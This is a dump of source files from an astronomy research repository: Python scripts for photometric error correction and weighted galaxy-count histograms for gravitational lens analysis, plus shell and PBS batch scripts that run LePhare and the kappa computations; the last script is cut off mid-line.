F[i]\n\nz=np.linspace(0,0.3,1000)\nplt.plot(z,z)\nplt.xlim(0,0.5)\nplt.ylim(0,0.5)\nplt.scatter(err,err_recover,label='recovered')\nplt.scatter(err,err_new,color=\"red\",label='corrected')\nplt.xlabel('sextractor error')\nplt.ylabel('computed error')\nplt.legend()\nplt.show()\n\n# use the maximum errors between original and recalculated, and replace the NaN values\nerr_recover[err_recover > 99] = 99.0000\nerr_new[err_new > 99] = 99.0000\nerr_recover = np.maximum(err,err_recover)\nerr_new = np.maximum(err,err_new)\nerr_recover[np.isnan(err_recover)] = 99.0000\nerr_new[np.isnan(err_new)] = 99.0000\nnp.savetxt(savecat,err_new,fmt='%.4f')\n\n# below is for fitting power law with 2 parameters\n'''\n# fitting the power law\nstd_0 = gauss[0][2]\nfitfunc = lambda p, x: std_0 * p[0] * (x ** p[1])\nerrfunc = lambda p, x, y: (y - fitfunc(p, x))\ninit = [1,1.5]\nydata,xdata = gauss[:,2], range(1,Nmax+1)\nout = leastsq( errfunc, init, args=(xdata, ydata))\nc = out[0]\nplt.yscale('log')\nplt.plot(xdata, fitfunc(c, xdata))\nplt.plot(xdata, fitfunc(np.array([1,1]), xdata),'r--')\nplt.plot(xdata, 
fitfunc(np.array([1,2]), xdata),'r--')\nplt.scatter(xdata,ydata)\nplt.xlabel('N')\nplt.ylabel('RMS [counts/s]')\nplt.xlim(0,Nmax + 1)\nplt.title(r'$\\sigma^2 = %.3f\\ \\alpha = %.3f\\ \\beta = %.3f\\ $' %(std_0**2,c[0],c[1]))\nplt.show()\n\n# read the Sextractor catalogue and correct the errors\nID,xpos,ypos,F,err,area = np.loadtxt('r.cat',usecols=[0,1,2,4,7,8],unpack=True)\nvar = np.zeros(len(xpos))\nerr_recover = np.zeros(len(xpos))\nerr_new = np.zeros(len(xpos))\nfor i in range(len(xpos)):\n var[i] = rms[int(ypos[i])][int(xpos[i])] # switched xpos and ypos because this is how fits images are read to the array\n err_recover[i] = 1.0857 * np.sqrt(area[i] * var[i] + F[i]/gain)/F[i]\n err_new[i] = 1.0857 * np.sqrt(var[i] * (c[0] ** 2) * (area[i]**c[1]) + F[i]/gain)/F[i]\n '''\n" }, { "alpha_fraction": 0.6509542465209961, "alphanum_fraction": 0.7054495215415955, "avg_line_length": 64.89393615722656, "blob_id": "41706f1d0aded78024547bef2fd10a087091913c", "content_id": "f3cea212725c531d97beadeadd24fcd8bf8e29f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4349, "license_type": "no_license", "max_line_length": 263, "num_lines": 66, "path": "/python/config_utilities/runconfig.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#! /bin/sh\n#Builds the template libraries and puts them in $LEPHAREWORK/\n\nLEPHAREDIR=$HOME/lephare_dev\nPARA=$HOME/lephare_dev/config/lephare_CFHTLenS.para\n\nLEPHAREWORK=$HOME/lephare_dev/work\n\nexport LEPHAREDIR\nexport LEPHAREWORK\n\nif [ ! -d $LEPHAREWORK ]; then\n echo \"creating $LEPHAREWORK...\"\n mkdir $LEPHAREWORK\n mkdir $LEPHAREWORK/filt\n mkdir $LEPHAREWORK/lib_mag\n mkdir $LEPHAREWORK/lib_bin\nfi\n\n#Filter transmission curves\n$LEPHAREDIR/source/filter -c $PARA -FILTER_LIST cfht/megacam/CFHTLS_u.pb,cfht/megacam/CFHTLS_g.pb,cfht/megacam/CFHTLS_r.pb,cfht/megacam/CFHTLS_i.pb,cfht/megacam/CFHTLS_y.pb,cfht/megacam/CFHTLS_z.pb\n#Galaxy templates -------------------------------#\n#CWW\n#$LEPHAREDIR/source/sedtolib -c $PARA -t G -GAL_LIB LIB_CWW -GAL_SED $LEPHAREDIR/sed/GAL/CWW_KINNEY/CWW_MOD.list\n#$LEPHAREDIR/source/mag_gal -c $PARA -t G -GAL_LIB_IN LIB_CWW -GAL_LIB_OUT MAG_CWW -MOD_EXTINC 3,10 -EB_V 0.,0.05,0.1,0.15,0.2,0.25,0.3\n\n#NOT FOUND:\n#CWW - improved Ilbert et al. 
(2006) templates + optimized for CFHTLS and interpolated\n#$LEPHAREDIR/source/sedtolib -c $PARA -t G -GAL_LIB LIB_CWW_CFHTLS -GAL_SED $LEPHAREDIR/sed/GAL/CFHTLS_WIDE/CE_MOD.list\n#$LEPHAREDIR/source/mag_gal -c $PARA -t G -GAL_LIB_IN LIB_CWW_CFHTLS -GAL_LIB_OUT MAG_CWW_CFHTLS -MOD_EXTINC 40,70 -EXTINC_LAW SMC_prevot.dat -EB_V 0.000,0.05,0.1,0.15,0.2,0.25\n\n#NOT FOUND:\n#CWW - same as above but slightly more recent\n#$LEPHAREDIR/source/sedtolib -c $PARA -t G -GAL_LIB LIB_CWW_CFHTLS_NEW -GAL_SED $LEPHAREDIR/sed/GAL/PHOTO_230506/CE_MOD.list\n#$LEPHAREDIR/source/mag_gal -c $PARA -t G -GAL_LIB_IN LIB_CWW_CFHTLS_NEW -GAL_LIB_OUT MAG_CWW_CFHTLS_NEW -MOD_EXTINC 38,100 -EXTINC_LAW SMC_prevot.dat -EB_V 0.000,0.05,0.1,0.15,0.2\n\n#CWW - COSMOS\n#$LEPHAREDIR/source/sedtolib -c $PARA -t G -GAL_LIB LIB_CWW_COSMOS -GAL_SED $LEPHAREDIR/sed/GAL/COSMOS_SED/COSMOS_MOD.list\n#$LEPHAREDIR/source/mag_gal -c $PARA -t G -GAL_LIB_IN LIB_CWW_COSMOS -GAL_LIB_OUT MAG_CWW_COSMOS -MOD_EXTINC 13,23,23,31,23,31,23,31 -EXTINC_LAW SMC_prevot.dat,SB_calzetti.dat,SB_calzetti_bump1.dat,SB_calzetti_bump2.dat -EB_V 0.000,0.100,0.200,0.300,0.400,0.500\n\n#Bruzual & Charlot - Atsushi\n#$LEPHAREDIR/source/sedtolib -c $PARA -t G -GAL_LIB LIB_BC03 -GAL_SED $LEPHAREDIR/sed/GAL/HYPERZ/HYPERZ_GIS_MOD.list -SEL_AGE $LEPHAREDIR/sed/GAL/BC03_HSC/AGE_GISSEL_HZ.dat\n#$LEPHAREDIR/source/mag_gal -c $PARA -t G -GAL_LIB_IN LIB_BC03 -GAL_LIB_OUT MAG_BC03\n\n#Bruzual & Charlot - phys para\n#$LEPHAREDIR/source/sedtolib -c $PARA -t G -GAL_LIB LIB_BC03 -GAL_SED $LEPHAREDIR/sed/GAL/BC03_CHAB/BC03_MOD.list -SEL_AGE $LEPHAREDIR/sed/GAL/BC03_CHAB/BC03_AGE.list\n#$LEPHAREDIR/source/mag_gal -c $PARA -t G -GAL_LIB_IN LIB_BC03 -GAL_LIB_OUT MAG_BC03 -EXTINC_LAW calzetti.dat -EB_V 0.,0.05,0.1,0.15,0.2,0.25,0.3 -MOD_EXTINC 0,100\n\n#Bruzual & Charlot - phys para for me, to be able to run without recompiling\n#$LEPHAREDIR/source/sedtolib -c $PARA -t G -GAL_LIB LIB_BC03 -GAL_SED $LEPHAREDIR/sed/GAL/BC03_CHAB/BC03_MOD.list -SEL_AGE $LEPHAREDIR/sed/GAL/BC03_CHAB/BC03_AGE.list\n#$LEPHAREDIR/source/mag_gal -c $PARA -t G -GAL_LIB_IN LIB_BC03 -GAL_LIB_OUT MAG_BC03 -EXTINC_LAW calzetti.dat -EB_V 0.,0.1,0.2,0.3,0.4,0.5 -MOD_EXTINC 0,100\n\n#Bruzual & Charlot - Ilbert et al. 
2009\n$LEPHAREDIR/source/sedtolib -c $PARA -t G -GAL_LIB LIB_BC03_I09 -GAL_SED $LEPHAREDIR/sed/GAL/BC03_CHAB/BC03_I09_MOD.list -SEL_AGE $LEPHAREDIR/sed/GAL/BC03_CHAB/BC03_AGE.list\n$LEPHAREDIR/source/mag_gal -c $PARA -t G -GAL_LIB_IN LIB_BC03_I09 -GAL_LIB_OUT MAG_BC03_I09 -EXTINC_LAW calzetti.dat -EB_V 0.,0.1,0.2,0.3,0.4,0.5 -MOD_EXTINC 0,20\n\n#$LEPHAREDIR/source/sedtolib -c $PARA -t G -GAL_LIB LIB_BC03_NO_EXT -GAL_SED $LEPHAREDIR/sed/GAL/BC03_CHAB/BC03_MOD.list -SEL_AGE $LEPHAREDIR/sed/GAL/BC03_CHAB/BC03_AGE.list\n#$LEPHAREDIR/source/mag_gal -c $PARA -t G -GAL_LIB_IN LIB_BC03_NO_EXT -GAL_LIB_OUT MAG_BC03_NO_EXT -EB_V 0.\n\n#Star templates ---------------------------------#\n$LEPHAREDIR/source/sedtolib -c $PARA -t S -STAR_LIB LIB_STAR -STAR_SED $LEPHAREDIR/sed/STAR/STAR_MOD.list\n$LEPHAREDIR/source/mag_star -c $PARA -t Q -STAR_LIB_IN LIB_STAR -STAR_LIB_OUT MAG_STAR\n\n#QSO templates ----------------------------------#\n$LEPHAREDIR/source/sedtolib -c $PARA -t Q -QSO_LIB LIB_QSO -QSO_SED $LEPHAREDIR/sed/QSO/QSO_MOD.list\n$LEPHAREDIR/source/mag_gal -c $PARA -t Q -QSO_LIB_IN LIB_QSO -QSO_LIB_OUT MAG_QSO\n" }, { "alpha_fraction": 0.5549174547195435, "alphanum_fraction": 0.6762383580207825, "avg_line_length": 43.935482025146484, "blob_id": "b7a0d9aaf7f7dcecfd783621f367f256e0850d5c", "content_id": "62b9660288083de88c6c12d74b1542598528e546", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1393, "license_type": "no_license", "max_line_length": 109, "num_lines": 31, "path": "/python/plot_utilities/plotkappazeta.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#\n\nimport pylab as plt\nimport numpy as np\n\nfile = '/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappadependencezeta/medstd.dat'\ndata = np.loadtxt(file,usecols=[1])\nmag = np.array([22.5,23,23.5,24])\nkappa45zeta05 = np.array([data[1],data[19],data[20],data[13]])\nkappa45zeta1 = np.array([data[5],data[6],data[7],data[18]])\nkappa45zeta15 = np.array([data[3],data[12],data[14],data[21]])\nkappa120zeta05 = np.array([data[4],data[9],data[11],data[15]])\nkappa120zeta1 = np.array([data[2],data[22],data[17],data[10]])\nkappa120zeta15 = np.array([data[0],data[16],data[23],data[8]])\nplt.clf()\nplt.plot(mag,kappa45zeta05,label='45 $\\zeta=0.5$',color='b')\nplt.plot(mag,kappa45zeta1,label='45 $\\zeta=1.0$',color='k')\nplt.plot(mag,kappa45zeta15,label='45 $\\zeta=1.5$',color='r')\nplt.plot(mag,kappa120zeta05,label='120 $\\zeta=0.5$',linestyle='-.',color='b')\nplt.plot(mag,kappa120zeta1,label='120 $\\zeta=1.0$',linestyle='-.',color='k')\nplt.plot(mag,kappa120zeta15,label='120 $\\zeta=1.5$',linestyle='-.',color='r')\n\n#plt.plot(kappa_values[:-1][::1],kappa_1[::1], linewidth=2, label ='$120: 1 + 1/r + \\gamma$', linestyle='-.')\nplt.xlabel(r'mag', fontsize=20)\nplt.xlim([22.5,24])\n#plt.set_xticklabels([22.5,23,23.5,24])\nplt.ylabel(r'$\\kappa_\\mathrm{med}$', fontsize=20)\nplt.legend(loc=\"lower right\")\nplt.xticks(np.linspace(22.5,24,4))\n#plt.show()\nplt.savefig('%s.png' % file[:-4], dpi=250, bbox_inches='tight')\n" }, { "alpha_fraction": 0.5834031701087952, "alphanum_fraction": 0.7443419694900513, "avg_line_length": 48.70833206176758, "blob_id": "96af98d1ed44b479823d7cb0d01fa53b1d7ae291", "content_id": "201315190a815ae4242147aaaf02ff730c38a25d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1193, "license_type": "no_license", "max_line_length": 120, "num_lines": 24, "path": 
"/python/scripts/NAOJ/batch3_insertstars_.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Logb3_.out\n#PBS -e Logb3_.err\n#PBS -N 3_\n#PBS -l mem=15gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f 23.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_1_N_4096_ang_4_rays_to_plane_34_f 23.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_2_N_4096_ang_4_rays_to_plane_34_f 23.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_3_N_4096_ang_4_rays_to_plane_34_f 23.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_4_N_4096_ang_4_rays_to_plane_34_f 23.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_5_N_4096_ang_4_rays_to_plane_34_f 23.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_6_N_4096_ang_4_rays_to_plane_34_f 23.5 120 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_7_N_4096_ang_4_rays_to_plane_34_f 23.5 120 measured 5 -1 -1\n" }, { "alpha_fraction": 0.6352829337120056, "alphanum_fraction": 0.7874464988708496, "avg_line_length": 62.727272033691406, "blob_id": "31ef8157b1ec10ae1726b382a4549cf84a279c81", "content_id": "6ba69c793f332dcd28e5207354d8e113b68ee1fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2103, "license_type": "no_license", "max_line_length": 117, "num_lines": 33, "path": "/python/scripts/NAOJ/batch1_insertstars.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Logb1.out\n#PBS -e Logb1.err\n#PBS -N 1\n#PBS -l mem=15gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_0_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_1_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_2_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_3_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_4_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_5_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_6_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_7_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_0_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_1_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_2_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_3_N_4096_ang_4_rays_to_plane_34_f 23 120 
measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_4_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_5_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_6_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_1_7_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\n" }, { "alpha_fraction": 0.5201928615570068, "alphanum_fraction": 0.6232945322990417, "avg_line_length": 64.63581848144531, "blob_id": "8e8dc8e39888bd80217d939e6e636c1eafe793d3", "content_id": "2232acb85803c54d058f23c005027f0d969fce87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21988, "license_type": "no_license", "max_line_length": 351, "num_lines": 335, "path": "/python/catalogue_utilities/weightinguniversal_histograms_samples.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# CE Rusu, Feb 13 2018\n# The code uses the weighted count ratios derived by weightinguniversal_overlap_sampling_nobeta_WFI2033rethought.py to produce histograms and compute the 16th, 50th and 84th percentiles, using the 10 samples\n# run as python /Users/cerusu/GITHUB/zMstarPDF/python/catalogue_utilities/weightinguniversal_histograms_samples.py WFI2033 45 5 23 meds bpz deti IRAC 0.61 0.71 100 removegrouphandpicked testduplicatesamples/testothersamples\n# After running this code, you need to combine the results into a final text file with the final distributions and widths, using weightinguniversal_histograms_finalcombine.py\n# If desired, run weightinguniversal_histograms_samples_publicationqualitynotext.py to produce a publication quality plot\n\nimport numpy as np\nimport sys\nimport os\nimport time\nimport matplotlib.pyplot as plt\n\nlens = str(sys.argv[1])\nradius = str(sys.argv[2])\ninner = str(sys.argv[3])\nmag = str(sys.argv[4])\nmode = str(sys.argv[5])\nphotz = str(sys.argv[6])\ndetect = str(sys.argv[7])\nirac = str(sys.argv[8])\nzinf = str(sys.argv[9])\nzsup = str(sys.argv[10])\nbin = int(str(sys.argv[11]))\ntry: handpicked = '_'+str(sys.argv[12])\nexcept: handpicked = ''\ntry: specialtest = '_'+str(sys.argv[13])\nexcept: specialtest = ''\n\nplt.clf()\n\nfontlegend = 8\nfontsize = 8\nfontordonate = 4\nfontabsciss = 8\nfontlabel = 2\npltrange = 3\nsamples = 10\nlimit = 10**30\nroot = \"/Volumes/LaCieSubaru/weightedcounts/%s/\" % lens\n\nstart_time = time.time()\n\nprint \"Working on samples:\"\n\nmedsum50W1 = np.zeros((18,samples))\nmedsum75W1 = np.zeros((18,samples))\nmedsum50W2 = np.zeros((18,samples))\nmedsum75W2 = np.zeros((18,samples))\nmedsum50W3 = np.zeros((18,samples))\nmedsum75W3 = np.zeros((18,samples))\nmedsum50W4 = np.zeros((18,samples))\nmedsum75W4 = np.zeros((18,samples))\n\nfor nr in range(samples):\n print '%s/%s' %(nr,samples-1)\n lstW1_50 = [x for x in os.listdir(root) if ('W1' in x) and ('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)] # select from the files in the root directory\n lstW1_75 = [x for x in os.listdir(root) if ('W1' in x) and ('_24galphotmstar_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW2_50 = [x for x in os.listdir(root) if ('W2' in x) and 
('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW2_75 = [x for x in os.listdir(root) if ('W2' in x) and ('_24galphotmstar_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW3_50 = [x for x in os.listdir(root) if ('W3' in x) and ('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW3_75 = [x for x in os.listdir(root) if ('W3' in x) and ('_24galphotmstar_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW4_50 = [x for x in os.listdir(root) if ('W4' in x) and ('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW4_75 = [x for x in os.listdir(root) if ('W4' in x) and ('_24galphotmstar_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_%s%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n\n if mag == \"24\" and photz == \"bpz\": cols=[4,6,8,10,12,14,16,18,20,22,24,26,28,30,32,34,36,38]\n if mag == \"24\" and photz == \"eazy\": cols=[40,42,44,46,48,50,52,54,56,58,60,62,64,66,68,70,72,74]\n if mag == \"23\" and photz == \"bpz\": cols=[5,7,9,11,13,15,17,19,21,23,25,27,29,31,33,35,37,39]\n if mag == \"23\" and photz == \"eazy\": cols=[41,43,45,47,49,51,53,55,57,59,61,63,65,67,69,71,73,75]\n\n print \"W1...\"\n for i in range(len(lstW1_50)):\n if i == 0:\n q_W1_50read = np.loadtxt(root+lstW1_50[i], usecols=cols, unpack=True)\n else:\n q_W1_50read = np.r_['1',q_W1_50read,np.loadtxt(root+ lstW1_50[i], usecols=cols, unpack=True)]\n #print np.shape(q_W1_50read)\n for i in range(len(lstW1_75)):\n if i == 0:\n q_W1_75read = np.loadtxt(root+lstW1_75[i], usecols=cols, unpack=True)\n else:\n q_W1_75read = np.r_['1',q_W1_75read,np.loadtxt(root+ lstW1_75[i], usecols=cols, unpack=True)]\n\n print \"W2...\"\n for i in range(len(lstW2_50)):\n if i == 0:\n q_W2_50read = np.loadtxt(root+lstW2_50[i], usecols=cols, unpack=True)\n else:\n q_W2_50read = np.r_['1',q_W2_50read,np.loadtxt(root+ lstW2_50[i], usecols=cols, unpack=True)]\n for i in range(len(lstW2_75)):\n if i == 0:\n q_W2_75read = np.loadtxt(root+lstW2_75[i], usecols=cols, unpack=True)\n else:\n q_W2_75read = np.r_['1',q_W2_75read,np.loadtxt(root+ lstW2_75[i], usecols=cols, unpack=True)]\n\n print \"W3...\"\n for i in range(len(lstW3_50)):\n if i == 0:\n q_W3_50read = np.loadtxt(root+lstW3_50[i], usecols=cols, unpack=True)\n else:\n q_W3_50read = np.r_['1',q_W3_50read,np.loadtxt(root+ lstW3_50[i], usecols=cols, unpack=True)]\n for i in range(len(lstW3_75)):\n if i == 0:\n q_W3_75read = np.loadtxt(root+lstW3_75[i], usecols=cols, unpack=True)\n else:\n q_W3_75read = np.r_['1',q_W3_75read,np.loadtxt(root+ lstW3_75[i], usecols=cols, unpack=True)]\n\n print \"W4...\"\n for i in range(len(lstW4_50)):\n if i == 0:\n q_W4_50read = np.loadtxt(root+lstW4_50[i], usecols=cols, unpack=True)\n else:\n q_W4_50read = np.r_['1',q_W4_50read,np.loadtxt(root+ lstW4_50[i], usecols=cols, unpack=True)]\n for i in range(len(lstW4_75)):\n if i == 0:\n q_W4_75read = np.loadtxt(root+lstW4_75[i], usecols=cols, unpack=True)\n else:\n q_W4_75read = 
np.r_['1',q_W4_75read,np.loadtxt(root+ lstW4_75[i], usecols=cols, unpack=True)]\n\n for j in range(18):\n q_W1_50 = q_W1_50read[j][q_W1_50read[j] < limit]\n if mode == \"sum\": q_W1_50 = abs(q_W1_50)\n q_W1_75 = q_W1_75read[j][q_W1_75read[j] < limit]\n if mode == \"sum\": q_W1_75 = abs(q_W1_75)\n q_W2_50 = q_W2_50read[j][q_W2_50read[j] < limit]\n if mode == \"sum\": q_W2_50 = abs(q_W2_50)\n q_W2_75 = q_W2_75read[j][q_W2_75read[j] < limit]\n if mode == \"sum\": q_W2_75 = abs(q_W2_75)\n q_W3_50 = q_W3_50read[j][q_W3_50read[j] < limit]\n if mode == \"sum\": q_W3_50 = abs(q_W3_50)\n q_W3_75 = q_W3_75read[j][q_W3_75read[j] < limit]\n if mode == \"sum\": q_W3_75 = abs(q_W3_75)\n q_W4_50 = q_W4_50read[j][q_W4_50read[j] < limit]\n if mode == \"sum\": q_W4_50 = abs(q_W4_50)\n q_W4_75 = q_W4_75read[j][q_W4_75read[j] < limit]\n if mode == \"sum\": q_W4_75 = abs(q_W4_75)\n\n if mode == \"sum\":\n medsum50W1[j][nr] = np.average(q_W1_50)\n medsum75W1[j][nr] = np.average(q_W1_75)\n medsum50W2[j][nr] = np.average(q_W2_50)\n medsum75W2[j][nr] = np.average(q_W2_75)\n medsum50W3[j][nr] = np.average(q_W3_50)\n medsum75W3[j][nr] = np.average(q_W3_75)\n medsum50W4[j][nr] = np.average(q_W4_50)\n medsum75W4[j][nr] = np.average(q_W4_75)\n if mode == \"meds\":\n medsum50W1[j][nr] = np.median(q_W1_50)\n medsum75W1[j][nr] = np.median(q_W1_75)\n medsum50W2[j][nr] = np.median(q_W2_50)\n medsum75W2[j][nr] = np.median(q_W2_75)\n medsum50W3[j][nr] = np.median(q_W3_50)\n medsum75W3[j][nr] = np.median(q_W3_75)\n medsum50W4[j][nr] = np.median(q_W4_50)\n medsum75W4[j][nr] = np.median(q_W4_75)\n\nstd50W1_inf = np.zeros(18)\nstd50W1_sup = np.zeros(18)\nstd50W2_inf = np.zeros(18)\nstd50W2_sup = np.zeros(18)\nstd50W3_inf = np.zeros(18)\nstd50W3_sup = np.zeros(18)\nstd50W4_inf = np.zeros(18)\nstd50W4_sup = np.zeros(18)\nstd75W1_inf = np.zeros(18)\nstd75W1_sup = np.zeros(18)\nstd75W2_inf = np.zeros(18)\nstd75W2_sup = np.zeros(18)\nstd75W3_inf = np.zeros(18)\nstd75W3_sup = np.zeros(18)\nstd75W4_inf = np.zeros(18)\nstd75W4_sup = np.zeros(18)\nstd_inf = np.zeros(18)\nstd_sup = np.zeros(18)\n\nfor i in range(18):\n std50W1_inf[i] = np.percentile(medsum50W1[i], 16)\n std50W1_sup[i] = np.percentile(medsum50W1[i], 84)\n std50W2_inf[i] = np.percentile(medsum50W2[i], 16)\n std50W2_sup[i] = np.percentile(medsum50W2[i], 84)\n std50W3_inf[i] = np.percentile(medsum50W3[i], 16)\n std50W3_sup[i] = np.percentile(medsum50W3[i], 84)\n std50W4_inf[i] = np.percentile(medsum50W4[i], 16)\n std50W4_sup[i] = np.percentile(medsum50W4[i], 84)\n std75W1_inf[i] = np.percentile(medsum75W1[i], 16)\n std75W1_sup[i] = np.percentile(medsum75W1[i], 84)\n std75W2_inf[i] = np.percentile(medsum75W2[i], 16)\n std75W2_sup[i] = np.percentile(medsum75W2[i], 84)\n std75W3_inf[i] = np.percentile(medsum75W3[i], 16)\n std75W3_sup[i] = np.percentile(medsum75W3[i], 84)\n std75W4_inf[i] = np.percentile(medsum75W4[i], 16)\n std75W4_sup[i] = np.percentile(medsum75W4[i], 84)\n std_inf[i] = np.percentile([medsum50W1[i],medsum50W2[i],medsum50W3[i],medsum50W4[i],medsum75W1[i],medsum75W2[i],medsum75W3[i],medsum75W4[i]], 16)\n std_sup[i] = np.percentile([medsum50W1[i],medsum50W2[i],medsum50W3[i],medsum50W4[i],medsum75W1[i],medsum75W2[i],medsum75W3[i],medsum75W4[i]], 84)\n\nprint \"Plotting...\"\n\nplt.suptitle(r'%s weighted counts histogram W1-W4 %s arcsec %s inner %s %s %s %s %s %s zgap %s %s' % (lens, radius, inner, mag, mode, photz, irac, detect, handpicked, zinf, zsup), fontsize=fontsize, y=0.998)\n\nfor i in range(18):\n if i == 0: ax=plt.subplot(5,4,1)\n if i == 1: 
ax=plt.subplot(5,4,2)\n if i == 2: ax=plt.subplot(5,4,3)\n if i == 3: ax=plt.subplot(5,4,4)\n if i == 4: ax=plt.subplot(5,4,5)\n if i == 5: ax=plt.subplot(5,4,6)\n if i == 6: ax=plt.subplot(5,4,7)\n if i == 7: ax=plt.subplot(5,4,8)\n if i == 8: ax=plt.subplot(5,4,9)\n if i == 9: ax=plt.subplot(5,4,10)\n if i == 10: ax=plt.subplot(5,4,11)\n if i == 11: ax=plt.subplot(5,4,12)\n if i == 12: ax=plt.subplot(5,4,13)\n if i == 13: ax=plt.subplot(5,4,14)\n if i == 14: ax=plt.subplot(5,4,15)\n if i == 15: ax=plt.subplot(5,4,17)\n if i == 16: ax=plt.subplot(5,4,18)\n if i == 17: ax=plt.subplot(5,4,19)\n\n q_W1_50 = q_W1_50read[i][q_W1_50read[i] < limit]\n if mode == \"sum\": q_W1_50 = abs(q_W1_50) # fix the negative halo convergence\n q_W1_75 = q_W1_75read[i][q_W1_75read[i] < limit]\n if mode == \"sum\": q_W1_75 = abs(q_W1_75)\n q_W2_50 = q_W2_50read[i][q_W2_50read[i] < limit]\n if mode == \"sum\": q_W2_50 = abs(q_W2_50)\n q_W2_75 = q_W2_75read[i][q_W2_75read[i] < limit]\n if mode == \"sum\": q_W2_75 = abs(q_W2_75)\n q_W3_50 = q_W3_50read[i][q_W3_50read[i] < limit]\n if mode == \"sum\": q_W3_50 = abs(q_W3_50)\n q_W3_75 = q_W3_75read[i][q_W3_75read[i] < limit]\n if mode == \"sum\": q_W3_75 = abs(q_W3_75)\n q_W4_50 = 